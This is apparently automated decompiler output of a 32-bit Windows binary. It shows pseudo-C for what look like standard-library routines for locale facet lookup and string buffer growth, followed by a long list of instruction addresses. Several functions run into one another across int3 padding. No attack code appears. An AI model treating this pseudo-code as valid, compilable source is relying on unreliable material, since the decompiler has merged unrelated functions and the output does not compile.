                                                                                      				unsigned int _t238;
                                                                                      				void* _t239;
                                                                                      				signed int _t248;
                                                                                      				signed int _t250;
                                                                                      				void* _t254;
                                                                                      				signed int _t258;
                                                                                      				void* _t259;
                                                                                      				signed int* _t260;
                                                                                      				signed int* _t261;
                                                                                      				signed int _t269;
                                                                                      				intOrPtr _t275;
                                                                                      				signed int* _t276;
                                                                                      				void* _t280;
                                                                                      				signed int _t284;
                                                                                      				void* _t286;
                                                                                      				void* _t293;
                                                                                      				void* _t296;
                                                                                      				intOrPtr _t299;
                                                                                      				signed int _t300;
                                                                                      				signed int _t301;
                                                                                      				signed int _t302;
                                                                                      				intOrPtr _t306;
                                                                                      				signed int _t308;
                                                                                      				signed int _t309;
                                                                                      				signed int _t311;
                                                                                      				void* _t312;
                                                                                      				signed int _t314;
                                                                                      				signed int _t326;
                                                                                      				signed int _t327;
                                                                                      				void* _t328;
                                                                                      				signed int _t329;
                                                                                      				signed int _t331;
                                                                                      				signed int _t332;
                                                                                      				intOrPtr _t333;
                                                                                      				void* _t335;
                                                                                      				signed int _t336;
                                                                                      				signed int _t339;
                                                                                      				signed int _t340;
                                                                                      				signed int _t342;
                                                                                      				signed int _t345;
                                                                                      				signed int _t346;
                                                                                      				signed int _t348;
                                                                                      				signed int _t351;
                                                                                      				signed int _t353;
                                                                                      				signed int _t357;
                                                                                      				void* _t359;
                                                                                      				void* _t361;
                                                                                      				void* _t362;
                                                                                      				signed int _t371;
                                                                                      				void* _t372;
                                                                                      				void* _t374;
                                                                                      				void* _t375;
                                                                                      				signed int _t376;
                                                                                      
                                                                                      				_t357 = _t371;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431c55);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t372 = _t371 - 0x14;
                                                                                      				_t154 =  *0x443048; // 0x9900ec21
                                                                                      				_t155 = _t154 ^ _t357;
                                                                                      				_v20 = _t155;
                                                                                      				_push(__ebx);
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_push(_t155);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t326 = _a4;
                                                                                      				_t268 =  &_v32;
                                                                                      				_v28 = _t326;
                                                                                      				_t157 = E0041247D( &_v32, 0);
                                                                                      				_v8 = 0;
                                                                                      				_t311 =  *0x444fd0; // 0x0
                                                                                      				_t258 =  *0x444f40; // 0x0
                                                                                      				_v36 = _t258;
                                                                                      				if(_t311 == 0) {
                                                                                      					__ecx =  &_v24;
                                                                                      					__eax = E0041247D( &_v24, __edi);
                                                                                      					__eflags =  *0x444fd0 - __edi; // 0x0
                                                                                      					if(__eflags == 0) {
                                                                                      						__eax =  *0x444310; // 0x2
                                                                                      						__eax = __eax + 1;
                                                                                      						__eflags = __eax;
                                                                                      						 *0x444310 = __eax;
                                                                                      						 *0x444fd0 = __eax;
                                                                                      					}
                                                                                      					__ecx =  &_v24;
                                                                                      					__eax = E004124D5(__ecx);
                                                                                      					__edi =  *0x444fd0; // 0x0
                                                                                      				}
                                                                                      				_t298 =  *(_t326 + 4);
                                                                                      				_t269 = _t311 * 4;
                                                                                      				_v24 = _t269;
                                                                                      				__eflags = _t311 -  *((intOrPtr*)(_t298 + 0xc));
                                                                                      				if(_t311 >=  *((intOrPtr*)(_t298 + 0xc))) {
                                                                                      					_t327 = 0;
                                                                                      					__eflags = 0;
                                                                                      					_v24 = _t269;
                                                                                      					goto L17;
                                                                                      				} else {
                                                                                      					_t327 =  *(_t269 +  *((intOrPtr*)(_t298 + 8)));
                                                                                      					__eflags = _t327;
                                                                                      					if(_t327 != 0) {
                                                                                      						L25:
                                                                                      						E004124D5( &_v32);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t312);
                                                                                      						_pop(_t328);
                                                                                      						_pop(_t259);
                                                                                      						__eflags = _v20 ^ _t357;
                                                                                      						return E0041361E(_t327, _t259, _v20 ^ _t357, _t298, _t312, _t328);
                                                                                      					} else {
                                                                                      						L17:
                                                                                      						__eflags =  *((char*)(_t298 + 0x14));
                                                                                      						if( *((char*)(_t298 + 0x14)) == 0) {
                                                                                      							L20:
                                                                                      							__eflags = _t327;
                                                                                      							if(_t327 != 0) {
                                                                                      								goto L25;
                                                                                      							} else {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t254 = E0041265A();
                                                                                      							__eflags = _t311 -  *((intOrPtr*)(_t254 + 0xc));
                                                                                      							if(_t311 >=  *((intOrPtr*)(_t254 + 0xc))) {
                                                                                      								L21:
                                                                                      								__eflags = _t258;
                                                                                      								if(_t258 == 0) {
                                                                                      									_t162 = E00408E80(_t258, _t311, _t327,  &_v36, _v28);
                                                                                      									_t374 = _t372 + 8;
                                                                                      									__eflags = _t162 - 0xffffffff;
                                                                                      									if(__eflags == 0) {
                                                                                      										_t163 = E00403390();
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t357);
                                                                                      										_t359 = _t374;
                                                                                      										_push(_t327);
                                                                                      										_push(_t311);
                                                                                      										_t311 = _t298;
                                                                                      										_t329 = _t269;
                                                                                      										__eflags = _t329 - _t311;
                                                                                      										if(_t329 == _t311) {
                                                                                      											L35:
                                                                                      											return _t163;
                                                                                      										} else {
                                                                                      											do {
                                                                                      												_t275 =  *((intOrPtr*)(_t329 + 0x14));
                                                                                      												__eflags = _t275 - 0x10;
                                                                                      												if(_t275 < 0x10) {
                                                                                      													goto L34;
                                                                                      												} else {
                                                                                      													_t164 =  *_t329;
                                                                                      													_t276 = _t275 + 1;
                                                                                      													__eflags = _t276 - 0x1000;
                                                                                      													if(_t276 < 0x1000) {
                                                                                      														L33:
                                                                                      														_push(_t276);
                                                                                      														_t163 = E004138AD(_t164);
                                                                                      														_t374 = _t374 + 8;
                                                                                      														goto L34;
                                                                                      													} else {
                                                                                      														_t299 =  *((intOrPtr*)(_t164 - 4));
                                                                                      														_t276 =  &(_t276[8]);
                                                                                      														__eflags = _t164 - _t299 + 0xfffffffc - 0x1f;
                                                                                      														if(_t164 - _t299 + 0xfffffffc > 0x1f) {
                                                                                      															E0041805F(_t258, _t276, _t299);
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															asm("int3");
                                                                                      															_push(_t359);
                                                                                      															_t361 = _t374;
                                                                                      															_t375 = _t374 - 0xc;
                                                                                      															_push(_t258);
                                                                                      															_t260 = _t276;
                                                                                      															_t277 = 0x7fffffff;
                                                                                      															_push(_t329);
                                                                                      															_t331 = _v56;
                                                                                      															_t300 = _t260[4];
                                                                                      															_v68 = _t300;
                                                                                      															_push(_t311);
                                                                                      															__eflags = 0x7fffffff - _t300 - _t331;
                                                                                      															if(0x7fffffff - _t300 < _t331) {
                                                                                      																E00401BD0(_t260, 0x7fffffff, _t300);
                                                                                      																goto L58;
                                                                                      															} else {
                                                                                      																_t311 = _t260[5];
                                                                                      																_t236 = _t300 + _t331;
                                                                                      																_v24 = _t236;
                                                                                      																_t351 = _t236 | 0x0000000f;
                                                                                      																_v20 = _t311;
                                                                                      																__eflags = _t351 - 0x7fffffff;
                                                                                      																if(_t351 <= 0x7fffffff) {
                                                                                      																	_t238 = _t311 >> 1;
                                                                                      																	_t277 = 0x7fffffff - _t238;
                                                                                      																	__eflags = _t311 - _t277;
                                                                                      																	if(_t311 <= _t277) {
                                                                                      																		_t239 = _t238 + _t311;
                                                                                      																		__eflags = _t351 - _t239;
                                                                                      																		_t331 =  <  ? _t239 : _t351;
                                                                                      																		_t60 = _t331 + 1; // 0x80000000
                                                                                      																		_t277 = _t60;
                                                                                      																		__eflags = _t277 - 0x1000;
                                                                                      																		if(_t277 < 0x1000) {
                                                                                      																			__eflags = _t277;
                                                                                      																			if(__eflags == 0) {
                                                                                      																				_t311 = 0;
                                                                                      																				__eflags = 0;
                                                                                      																			} else {
                                                                                      																				_t248 = E0041362C(_t260, _t311, _t331, __eflags, _t277);
                                                                                      																				_t300 = _v16;
                                                                                      																				_t375 = _t375 + 4;
                                                                                      																				_t311 = _t248;
                                                                                      																			}
                                                                                      																			goto L51;
                                                                                      																		} else {
                                                                                      																			_t61 = _t277 + 0x23; // 0x80000023
                                                                                      																			_t249 = _t61;
                                                                                      																			__eflags = _t61 - _t277;
                                                                                      																			if(__eflags <= 0) {
                                                                                      																				L58:
                                                                                      																				E00401B30();
                                                                                      																				goto L59;
                                                                                      																			} else {
                                                                                      																				goto L41;
                                                                                      																			}
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		_t331 = 0x7fffffff;
                                                                                      																		goto L40;
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	_t331 = 0x7fffffff;
                                                                                      																	L40:
                                                                                      																	_t249 = 0xffffffff80000023;
                                                                                      																	__eflags = 0x80000000;
                                                                                      																	L41:
                                                                                      																	_t250 = E0041362C(_t260, _t311, _t331, __eflags, _t249);
                                                                                      																	_t375 = _t375 + 4;
                                                                                      																	__eflags = _t250;
                                                                                      																	if(_t250 == 0) {
                                                                                      																		L59:
                                                                                      																		E0041805F(_t260, _t277, _t300);
                                                                                      																		asm("int3");
                                                                                      																		asm("int3");
                                                                                      																		asm("int3");
                                                                                      																		asm("int3");
                                                                                      																		_push(_t361);
                                                                                      																		_t362 = _t375;
                                                                                      																		_t376 = _t375 - 0x14;
                                                                                      																		_push(_t260);
                                                                                      																		_t261 = _t277;
                                                                                      																		_t278 = 0x7fffffff;
                                                                                      																		_push(_t331);
                                                                                      																		_t332 = _v80;
                                                                                      																		_t301 = _t261[4];
                                                                                      																		_v92 = _t301;
                                                                                      																		_push(_t311);
                                                                                      																		__eflags = 0x7fffffff - _t301 - _t332;
                                                                                      																		if(0x7fffffff - _t301 < _t332) {
                                                                                      																			E00401BD0(_t261, 0x7fffffff, _t301);
                                                                                      																			goto L81;
                                                                                      																		} else {
                                                                                      																			_t311 = _t261[5];
                                                                                      																			_t213 = _t301 + _t332;
                                                                                      																			_v24 = _t213;
                                                                                      																			_t345 = _t213 | 0x0000000f;
                                                                                      																			_v28 = _t311;
                                                                                      																			__eflags = _t345 - 0x7fffffff;
                                                                                      																			if(_t345 <= 0x7fffffff) {
                                                                                      																				_t215 = _t311 >> 1;
                                                                                      																				_t278 = 0x7fffffff - _t215;
                                                                                      																				__eflags = _t311 - _t278;
                                                                                      																				if(_t311 <= _t278) {
                                                                                      																					_t216 = _t215 + _t311;
                                                                                      																					__eflags = _t345 - _t216;
                                                                                      																					_t332 =  <  ? _t216 : _t345;
                                                                                      																					_t90 = _t332 + 1; // 0x80000000
                                                                                      																					_t278 = _t90;
                                                                                      																					__eflags = _t278 - 0x1000;
                                                                                      																					if(_t278 < 0x1000) {
                                                                                      																						__eflags = _t278;
                                                                                      																						if(__eflags == 0) {
                                                                                      																							_t311 = 0;
                                                                                      																							__eflags = 0;
                                                                                      																						} else {
                                                                                      																							_t232 = E0041362C(_t261, _t311, _t332, __eflags, _t278);
                                                                                      																							_t301 = _v20;
                                                                                      																							_t376 = _t376 + 4;
                                                                                      																							_t311 = _t232;
                                                                                      																						}
                                                                                      																						goto L74;
                                                                                      																					} else {
                                                                                      																						_t91 = _t278 + 0x23; // 0x80000023
                                                                                      																						_t233 = _t91;
                                                                                      																						__eflags = _t91 - _t278;
                                                                                      																						if(__eflags <= 0) {
                                                                                      																							L81:
                                                                                      																							E00401B30();
                                                                                      																							goto L82;
                                                                                      																						} else {
                                                                                      																							goto L64;
                                                                                      																						}
                                                                                      																					}
                                                                                      																				} else {
                                                                                      																					_t332 = 0x7fffffff;
                                                                                      																					goto L63;
                                                                                      																				}
                                                                                      																			} else {
                                                                                      																				_t332 = 0x7fffffff;
                                                                                      																				L63:
                                                                                      																				_t233 = 0xffffffff80000023;
                                                                                      																				__eflags = 0x80000000;
                                                                                      																				L64:
                                                                                      																				_t234 = E0041362C(_t261, _t311, _t332, __eflags, _t233);
                                                                                      																				_t376 = _t376 + 4;
                                                                                      																				__eflags = _t234;
                                                                                      																				if(_t234 == 0) {
                                                                                      																					L82:
                                                                                      																					E0041805F(_t261, _t278, _t301);
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					_push(_t362);
                                                                                      																					_t357 = _t376;
                                                                                      																					_t372 = _t376 - 0x10;
                                                                                      																					_push(_t261);
                                                                                      																					_t258 = _t278;
                                                                                      																					_t279 = 0x7fffffff;
                                                                                      																					_push(_t332);
                                                                                      																					_t326 = _v112;
                                                                                      																					_t302 =  *((intOrPtr*)(_t258 + 0x10));
                                                                                      																					_v124 = _t302;
                                                                                      																					_push(_t311);
                                                                                      																					__eflags = 0x7fffffff - _t302 - _t326;
                                                                                      																					if(0x7fffffff - _t302 < _t326) {
                                                                                      																						E00401BD0(_t258, 0x7fffffff, _t302);
                                                                                      																						goto L104;
                                                                                      																					} else {
                                                                                      																						_t311 =  *(_t258 + 0x14);
                                                                                      																						_t191 = _t302 + _t326;
                                                                                      																						_v28 = _t191;
                                                                                      																						_t339 = _t191 | 0x0000000f;
                                                                                      																						_v32 = _t311;
                                                                                      																						__eflags = _t339 - 0x7fffffff;
                                                                                      																						if(_t339 <= 0x7fffffff) {
                                                                                      																							_t193 = _t311 >> 1;
                                                                                      																							_t279 = 0x7fffffff - _t193;
                                                                                      																							__eflags = _t311 - _t279;
                                                                                      																							if(_t311 <= _t279) {
                                                                                      																								_t194 = _t193 + _t311;
                                                                                      																								__eflags = _t339 - _t194;
                                                                                      																								_t326 =  <  ? _t194 : _t339;
                                                                                      																								_t130 = _t326 + 1; // 0x80000000
                                                                                      																								_t279 = _t130;
                                                                                      																								__eflags = _t279 - 0x1000;
                                                                                      																								if(_t279 < 0x1000) {
                                                                                      																									__eflags = _t279;
                                                                                      																									if(__eflags == 0) {
                                                                                      																										_t311 = 0;
                                                                                      																										__eflags = 0;
                                                                                      																									} else {
                                                                                      																										_t209 = E0041362C(_t258, _t311, _t326, __eflags, _t279);
                                                                                      																										_t302 = _v24;
                                                                                      																										_t372 = _t372 + 4;
                                                                                      																										_t311 = _t209;
                                                                                      																									}
                                                                                      																									goto L97;
                                                                                      																								} else {
                                                                                      																									_t131 = _t279 + 0x23; // 0x80000023
                                                                                      																									_t210 = _t131;
                                                                                      																									__eflags = _t131 - _t279;
                                                                                      																									if(__eflags <= 0) {
                                                                                      																										L104:
                                                                                      																										E00401B30();
                                                                                      																										goto L105;
                                                                                      																									} else {
                                                                                      																										goto L87;
                                                                                      																									}
                                                                                      																								}
                                                                                      																							} else {
                                                                                      																								_t326 = 0x7fffffff;
                                                                                      																								goto L86;
                                                                                      																							}
                                                                                      																						} else {
                                                                                      																							_t326 = 0x7fffffff;
                                                                                      																							L86:
                                                                                      																							_t210 = 0xffffffff80000023;
                                                                                      																							__eflags = 0x80000000;
                                                                                      																							L87:
                                                                                      																							_t211 = E0041362C(_t258, _t311, _t326, __eflags, _t210);
                                                                                      																							_t372 = _t372 + 4;
                                                                                      																							__eflags = _t211;
                                                                                      																							if(_t211 == 0) {
                                                                                      																								L105:
                                                                                      																								_t157 = E0041805F(_t258, _t279, _t302);
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								_t268 =  *_t279;
                                                                                      																								__eflags = _t268;
                                                                                      																								if(_t268 != 0) {
                                                                                      																									_push(_t311);
                                                                                      																									_t314 = _t268;
                                                                                      																									_t280 =  *_t314;
                                                                                      																									if(_t280 == 0) {
                                                                                      																										L6:
                                                                                      																										return _t157;
                                                                                      																									} else {
                                                                                      																										_push(_t326);
                                                                                      																										_push(_t280);
                                                                                      																										L27();
                                                                                      																										_t333 =  *_t314;
                                                                                      																										_t284 = (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2)) * 2 << 3;
                                                                                      																										if(_t284 < 0x1000) {
                                                                                      																											L5:
                                                                                      																											_push(_t284);
                                                                                      																											_t157 = E004138AD(_t333);
                                                                                      																											 *_t314 = 0;
                                                                                      																											 *((intOrPtr*)(_t314 + 4)) = 0;
                                                                                      																											 *((intOrPtr*)(_t314 + 8)) = 0;
                                                                                      																											goto L6;
                                                                                      																										} else {
                                                                                      																											_t306 =  *((intOrPtr*)(_t333 - 4));
                                                                                      																											_t284 = _t284 + 0x23;
                                                                                      																											_t335 = _t333 - _t306;
                                                                                      																											if(_t335 - 4 > 0x1f) {
                                                                                      																												E0041805F(_t258, _t284, _t306);
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												asm("int3");
                                                                                      																												_push(_t357);
                                                                                      																												__eflags = _v148 & 0x00000001;
                                                                                      																												_push(_t335);
                                                                                      																												_t336 = _t284;
                                                                                      																												 *_t336 = 0x4337e4;
                                                                                      																												if((_v148 & 0x00000001) != 0) {
                                                                                      																													_push(8);
                                                                                      																													E004138AD(_t336);
                                                                                      																												}
                                                                                      																												return _t336;
                                                                                      																											} else {
                                                                                      																												_t333 = _t306;
                                                                                      																												goto L5;
                                                                                      																											}
                                                                                      																										}
                                                                                      																									}
                                                                                      																								} else {
                                                                                      																									return _t157;
                                                                                      																								}
                                                                                      																							} else {
                                                                                      																								_t302 = _v24;
                                                                                      																								_t128 = _t211 + 0x23; // 0x23
                                                                                      																								_t311 = _t128 & 0xffffffe0;
                                                                                      																								 *(_t311 - 4) = _t211;
                                                                                      																								L97:
                                                                                      																								 *((intOrPtr*)(_t258 + 0x10)) = _v28;
                                                                                      																								_v24 = _v0;
                                                                                      																								 *(_t258 + 0x14) = _t326;
                                                                                      																								_t340 = _t311 + _t302;
                                                                                      																								_v36 = _t340;
                                                                                      																								__eflags = _v32 - 0x10;
                                                                                      																								_v28 = _v4 + _t340;
                                                                                      																								_push(_t302);
                                                                                      																								if(_v32 < 0x10) {
                                                                                      																									_push(_t258);
                                                                                      																									_push(_t311);
                                                                                      																									E00414BF0();
                                                                                      																									E00415180(_t311, _t340, _v24, _v4);
                                                                                      																									 *_v28 = 0;
                                                                                      																									 *_t258 = _t311;
                                                                                      																									return _t258;
                                                                                      																								} else {
                                                                                      																									_t342 =  *_t258;
                                                                                      																									_push(_t342);
                                                                                      																									_push(_t311);
                                                                                      																									E00414BF0();
                                                                                      																									E00415180(_t311, _v36, _v24, _v4);
                                                                                      																									_t372 = _t372 + 0x18;
                                                                                      																									_t286 = _v32 + 1;
                                                                                      																									 *_v28 = 0;
                                                                                      																									__eflags = _t286 - 0x1000;
                                                                                      																									if(_t286 < 0x1000) {
                                                                                      																										L101:
                                                                                      																										_push(_t286);
                                                                                      																										E004138AD(_t342);
                                                                                      																										 *_t258 = _t311;
                                                                                      																										return _t258;
                                                                                      																									} else {
                                                                                      																										_t302 =  *((intOrPtr*)(_t342 - 4));
                                                                                      																										_t279 = _t286 + 0x23;
                                                                                      																										_t326 = _t342 - _t302;
                                                                                      																										_t149 = _t326 - 4; // 0x7ffffffb
                                                                                      																										__eflags = _t149 - 0x1f;
                                                                                      																										if(_t149 > 0x1f) {
                                                                                      																											goto L105;
                                                                                      																										} else {
                                                                                      																											_t342 = _t302;
                                                                                      																											goto L101;
                                                                                      																										}
                                                                                      																									}
                                                                                      																								}
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																				} else {
                                                                                      																					_t301 = _v20;
                                                                                      																					_t88 = _t234 + 0x23; // 0x23
                                                                                      																					_t311 = _t88 & 0xffffffe0;
                                                                                      																					 *(_t311 - 4) = _t234;
                                                                                      																					L74:
                                                                                      																					_t261[4] = _v24;
                                                                                      																					_v20 = _a8;
                                                                                      																					_t219 = _v0;
                                                                                      																					_t261[5] = _t332;
                                                                                      																					_push(_t219);
                                                                                      																					_v32 = _t301 - _t219 + 1;
                                                                                      																					_t346 = _t311 + _t219;
                                                                                      																					_v36 = _t346;
                                                                                      																					__eflags = _v28 - 0x10;
                                                                                      																					_v24 = _a4 + _t346;
                                                                                      																					if(_v28 < 0x10) {
                                                                                      																						_push(_t261);
                                                                                      																						_push(_t311);
                                                                                      																						E00414BF0();
                                                                                      																						E00415180(_t311, _t346, _v20, _a4);
                                                                                      																						__eflags = _v0 + _t261;
                                                                                      																						E00414BF0(_v24, _v0 + _t261, _v32);
                                                                                      																						 *_t261 = _t311;
                                                                                      																						return _t261;
                                                                                      																					} else {
                                                                                      																						_t348 =  *_t261;
                                                                                      																						_push(_t348);
                                                                                      																						_push(_t311);
                                                                                      																						E00414BF0();
                                                                                      																						E00415180(_t311, _v36, _v20, _a4);
                                                                                      																						E00414BF0(_v24, _v0 + _t348, _v32);
                                                                                      																						_t376 = _t376 + 0x24;
                                                                                      																						_t293 = _v28 + 1;
                                                                                      																						__eflags = _t293 - 0x1000;
                                                                                      																						if(_t293 < 0x1000) {
                                                                                      																							L78:
                                                                                      																							_push(_t293);
                                                                                      																							E004138AD(_t348);
                                                                                      																							 *_t261 = _t311;
                                                                                      																							return _t261;
                                                                                      																						} else {
                                                                                      																							_t301 =  *(_t348 - 4);
                                                                                      																							_t278 = _t293 + 0x23;
                                                                                      																							_t332 = _t348 - _t301;
                                                                                      																							_t114 = _t332 - 4; // 0x7ffffffb
                                                                                      																							__eflags = _t114 - 0x1f;
                                                                                      																							if(_t114 > 0x1f) {
                                                                                      																								goto L82;
                                                                                      																							} else {
                                                                                      																								_t348 = _t301;
                                                                                      																								goto L78;
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																				}
                                                                                      																			}
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		_t300 = _v16;
                                                                                      																		_t58 = _t250 + 0x23; // 0x23
                                                                                      																		_t311 = _t58 & 0xffffffe0;
                                                                                      																		 *(_t311 - 4) = _t250;
                                                                                      																		L51:
                                                                                      																		__eflags = _v20 - 0x10;
                                                                                      																		_t260[4] = _v24;
                                                                                      																		_t260[5] = _t331;
                                                                                      																		_push(_t300);
                                                                                      																		if(_v20 < 0x10) {
                                                                                      																			_push(_t260);
                                                                                      																			_push(_t311);
                                                                                      																			E00414BF0();
                                                                                      																			_t308 = _v16;
                                                                                      																			 *((char*)(_t311 + _t308)) = _a4;
                                                                                      																			 *((char*)(_t311 + _t308 + 1)) = 0;
                                                                                      																			 *_t260 = _t311;
                                                                                      																			return _t260;
                                                                                      																		} else {
                                                                                      																			_t353 =  *_t260;
                                                                                      																			_push(_t353);
                                                                                      																			_push(_t311);
                                                                                      																			E00414BF0();
                                                                                      																			_t309 = _v16;
                                                                                      																			_t375 = _t375 + 0xc;
                                                                                      																			_t296 = _v20 + 1;
                                                                                      																			 *((char*)(_t311 + _t309)) = _a4;
                                                                                      																			 *((char*)(_t311 + _t309 + 1)) = 0;
                                                                                      																			__eflags = _t296 - 0x1000;
                                                                                      																			if(_t296 < 0x1000) {
                                                                                      																				L55:
                                                                                      																				_push(_t296);
                                                                                      																				E004138AD(_t353);
                                                                                      																				 *_t260 = _t311;
                                                                                      																				return _t260;
                                                                                      																			} else {
                                                                                      																				_t300 =  *(_t353 - 4);
                                                                                      																				_t277 = _t296 + 0x23;
                                                                                      																				_t331 = _t353 - _t300;
                                                                                      																				_t74 = _t331 - 4; // 0x7ffffffb
                                                                                      																				__eflags = _t74 - 0x1f;
                                                                                      																				if(_t74 > 0x1f) {
                                                                                      																					goto L59;
                                                                                      																				} else {
                                                                                      																					_t353 = _t300;
                                                                                      																					goto L55;
                                                                                      																				}
                                                                                      																			}
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														} else {
                                                                                      															_t164 = _t299;
                                                                                      															goto L33;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      												goto L108;
                                                                                      												L34:
                                                                                      												 *((intOrPtr*)(_t329 + 0x10)) = 0;
                                                                                      												 *((intOrPtr*)(_t329 + 0x14)) = 0xf;
                                                                                      												 *_t329 = 0;
                                                                                      												_t329 = _t329 + 0x18;
                                                                                      												__eflags = _t329 - _t311;
                                                                                      											} while (_t329 != _t311);
                                                                                      											goto L35;
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t327 = _v36;
                                                                                      										_v28 = _t327;
                                                                                      										_v8 = 1;
                                                                                      										E0041262E(__eflags, _t327);
                                                                                      										_t298 =  *_t327;
                                                                                      										 *((intOrPtr*)( *_t327 + 4))();
                                                                                      										 *0x444f40 = _t327;
                                                                                      										goto L25;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t327 = _t258;
                                                                                      									goto L25;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t327 =  *(_v24 +  *((intOrPtr*)(_t254 + 8)));
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				L108:
                                                                                      			}


























































































                                                                                      0x004088a1
                                                                                      0x004088a3
                                                                                      0x004088a5
                                                                                      0x004088b0
                                                                                      0x004088b1
                                                                                      0x004088b4
                                                                                      0x004088b9
                                                                                      0x004088bb
                                                                                      0x004088be
                                                                                      0x004088bf
                                                                                      0x004088c0
                                                                                      0x004088c1
                                                                                      0x004088c5
                                                                                      0x004088cb
                                                                                      0x004088ce
                                                                                      0x004088d3
                                                                                      0x004088d6
                                                                                      0x004088db
                                                                                      0x004088e2
                                                                                      0x004088e8
                                                                                      0x004088ee
                                                                                      0x004088f3
                                                                                      0x004088f6
                                                                                      0x004088f9
                                                                                      0x004088fe
                                                                                      0x00408904
                                                                                      0x00408906
                                                                                      0x0040890b
                                                                                      0x0040890b
                                                                                      0x0040890c
                                                                                      0x00408911
                                                                                      0x00408911
                                                                                      0x00408916
                                                                                      0x00408919
                                                                                      0x0040891e
                                                                                      0x0040891e
                                                                                      0x00408924
                                                                                      0x00408927
                                                                                      0x0040892e
                                                                                      0x00408931
                                                                                      0x00408934
                                                                                      0x00408942
                                                                                      0x00408942
                                                                                      0x00408944
                                                                                      0x00000000
                                                                                      0x00408936
                                                                                      0x00408939
                                                                                      0x0040893c
                                                                                      0x0040893e
                                                                                      0x004089a0
                                                                                      0x004089a3
                                                                                      0x004089ad
                                                                                      0x004089b5
                                                                                      0x004089b6
                                                                                      0x004089b7
                                                                                      0x004089bb
                                                                                      0x004089c5
                                                                                      0x00408940
                                                                                      0x00408947
                                                                                      0x00408947
                                                                                      0x0040894b
                                                                                      0x00408960
                                                                                      0x00408960
                                                                                      0x00408962
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040894d
                                                                                      0x0040894d
                                                                                      0x00408952
                                                                                      0x00408955
                                                                                      0x00408964
                                                                                      0x00408964
                                                                                      0x00408966
                                                                                      0x00408973
                                                                                      0x00408978
                                                                                      0x0040897b
                                                                                      0x0040897e
                                                                                      0x004089c6
                                                                                      0x004089cb
                                                                                      0x004089cc
                                                                                      0x004089cd
                                                                                      0x004089ce
                                                                                      0x004089cf
                                                                                      0x004089d0
                                                                                      0x004089d1
                                                                                      0x004089d3
                                                                                      0x004089d4
                                                                                      0x004089d5
                                                                                      0x004089d7
                                                                                      0x004089d9
                                                                                      0x004089db
                                                                                      0x00408a27
                                                                                      0x00408a2a
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e3
                                                                                      0x004089e6
                                                                                      0x00000000
                                                                                      0x004089e8
                                                                                      0x004089e8
                                                                                      0x004089ea
                                                                                      0x004089eb
                                                                                      0x004089f1
                                                                                      0x00408a05
                                                                                      0x00408a05
                                                                                      0x00408a07
                                                                                      0x00408a0c
                                                                                      0x00000000
                                                                                      0x004089f3
                                                                                      0x004089f3
                                                                                      0x004089f6
                                                                                      0x004089fe
                                                                                      0x00408a01
                                                                                      0x00408a2b
                                                                                      0x00408a30
                                                                                      0x00408a31
                                                                                      0x00408a32
                                                                                      0x00408a33
                                                                                      0x00408a34
                                                                                      0x00408a35
                                                                                      0x00408a36
                                                                                      0x00408a37
                                                                                      0x00408a38
                                                                                      0x00408a39
                                                                                      0x00408a3a
                                                                                      0x00408a3b
                                                                                      0x00408a3c
                                                                                      0x00408a3d
                                                                                      0x00408a3e
                                                                                      0x00408a3f
                                                                                      0x00408a40
                                                                                      0x00408a41
                                                                                      0x00408a43
                                                                                      0x00408a46
                                                                                      0x00408a47
                                                                                      0x00408a49
                                                                                      0x00408a50
                                                                                      0x00408a51
                                                                                      0x00408a54
                                                                                      0x00408a59
                                                                                      0x00408a5c
                                                                                      0x00408a5d
                                                                                      0x00408a5f
                                                                                      0x00408b6d
                                                                                      0x00000000
                                                                                      0x00408a65
                                                                                      0x00408a65
                                                                                      0x00408a68
                                                                                      0x00408a6d
                                                                                      0x00408a70
                                                                                      0x00408a73
                                                                                      0x00408a76
